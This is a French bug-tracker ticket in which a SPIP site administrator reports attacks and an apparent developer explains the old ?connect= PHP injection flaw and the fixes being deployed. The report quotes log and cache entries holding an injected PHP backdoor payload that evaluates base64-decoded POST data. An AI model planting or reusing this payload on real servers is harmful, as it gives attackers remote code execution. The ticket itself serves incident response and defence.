Project

General

Profile

Anomalie #3186

Faille de sécurité permettant l'éxecution code arbitraire ?

Added by Zenou Plasci about 5 years ago. Updated about 5 years ago.

Status:
Fermé
Priority:
Normal
Assignee:
-
Category:
-
Target version:
-
Start date:
03/13/2014
Due date:
% Done:

0%

Resolution:
Navigateur:

Description

Bonjour,

Notre serveur internet heberge plusieurs instances de SPIP (2.0.17, 3.0.5, 3.0.10, 3.0.15) qui ont toutes fait l'objet d'attaques le meme jour.
Les logs Apache nous incitent à penser que le code php présent dans les template permet d'exécuter du code PHP arbitraire sur le serveur:

./tmp/cache/skel/html_php_eval_base64_decode___POST_evv_____php___8cb61055a580123c6bf5e557ee95c074.php: $connect = '<php eval(base64_decode($_POST[evv]));<php #';

./tmp/cache/skel/html__php_eval_base64_decode___POST_evv______php___e1e5712fd8f023a9ac2d96c0f1b09c92.php: $connect = '

./cache/skel/html____php_eval_base64_decode___POST_evv________php___dc3dae177a4dedb727d6a881885c7da0.php:// Fonction principale du squelette squelettes-dist/inc-entete.html pour ?>

./tmp/cache/skel/html____php_eval_base64_decode___POST_evv________php___913c7f052c4bcf1138cfbfea45867b88.php:// Fonction principale du squelette plugins/menu_accordeon/inc-menu-accordeon.html pour ?>

./tmp/cache/skel/html____php_eval_base64_decode___POST_evv________php___2b0322f6212ab02fb205cd41fb952c47.php:// Fonction principale du squelette squelettes/inc-pied.html pour ?>

Nous avons vidé les cache, mais nous craignons une recidive.

History

#1 Updated by cedric - about 5 years ago

  • Status changed from Nouveau to Fermé

Après analyse, pas de risque ici : c'est une tentative d'exploitation d'une ancienne faille qui permettait de faire de l'injection de PHP par ?connect= ou variantes.
En version 2.x le seul petit problème est qu'on log le contenu de connect directement dans spip.log, ce qui peut ouvrir la porte à une execution distante si le fichier log peut etre par la suite inclus (mais il faudrait pour cela exploiter une seconde faille d'inclusion arbitraire).

Nous déployons une version 2.x qui echappe les < dans les logs pour eviter tout risque de ce type, et nous renforçons l'écran de sécurité pour bloquer ces requetes qui de toute façon ne font que générer des fichiers cache foireux. Nous vous conseillons de déployer la version 1.1.9 de l'écran ( http://www.spip.net/fr_article4200.html )

Also available in: Atom PDF